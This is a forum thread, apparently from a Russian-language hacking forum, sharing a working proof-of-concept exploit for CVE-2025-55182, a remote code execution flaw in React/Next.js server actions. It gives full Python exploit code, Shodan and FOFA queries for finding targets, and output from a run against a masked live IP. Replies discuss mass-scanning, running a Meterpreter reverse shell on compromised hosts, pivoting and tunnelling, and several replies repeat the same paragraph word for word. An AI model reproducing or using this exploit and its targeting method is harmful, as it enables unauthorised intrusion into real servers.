Remote React-CVE-2025-55182-RCE

[eyna]

A working poc for CVE-2025-55182-POC


SHODAN: http.component:"react"

FOFA: app="React.js"

poc: https://github.com/EynaExp/CVE-2025-55182-POC/

 

[Unseen]

import requests
import sys
import json

BASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000"
EXECUTABLE = sys.argv[2] if len(sys.argv) > 2 else "id"

crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}

headers = {"Next-Action": "x"}
res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)
print(res.status_code)
print(res.text)

result:
python main.py http://xx.xxx.xxx.xxx:3005/ "id"
500
0:{"a":"$@1","f":"","b":"yzlV0g1IJ52rwZSmjejoc"}
1:E{"digest":"uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),119(netdev),120(lxd)"}

 

[mailsz]

ищу кто сделает выгрузку фофа по данному запросу
допили. работает.

 

[rwxrwx]

PoC, как и большинство других, которые вы найдете в открытых источниках, хорошо работает с простыми командами, такими как «id» и «whoami», но когда вы пытаетесь запустить программу в фоновом режиме, это будет сложно, поскольку команды выполняются в подоболочке в JavaScript и сразу же после выполнения завершаются.

 

[бегемот]

PoC, как и большинство других, которые вы найдете в открытых источниках, хорошо работает с простыми командами, такими как «id» и «whoami», но когда вы пытаетесь запустить программу в фоновом режиме, это будет сложно, поскольку команды выполняются в подоболочке в JavaScript и сразу же после выполнения завершаются.

Этот фильм не основан на общедоступном сценарии; он был полностью переписан, и он делает гораздо больше, чем другие.

 

[wav]

PoC, как и большинство других, которые вы найдете в открытых источниках, хорошо работает с простыми командами, такими как «id» и «whoami», но когда вы пытаетесь запустить программу в фоновом режиме, это будет сложно, поскольку команды выполняются в подоболочке в JavaScript и сразу же после выполнения завершаются.

ну не знаю у меня запускается ревшел меты и робит пока не выйду. только чёт ничего полезного я там не нашёл, если в вине можно хоть как то извратится то там через пивотинг я не одной тачки не нашёл с виндой.. по мне так безполезная бага. гдето даже ./fscan залил и тож пустота.

 

[mailsz]

resocks и мы сети... но чаще сайты лежат отдельно. факт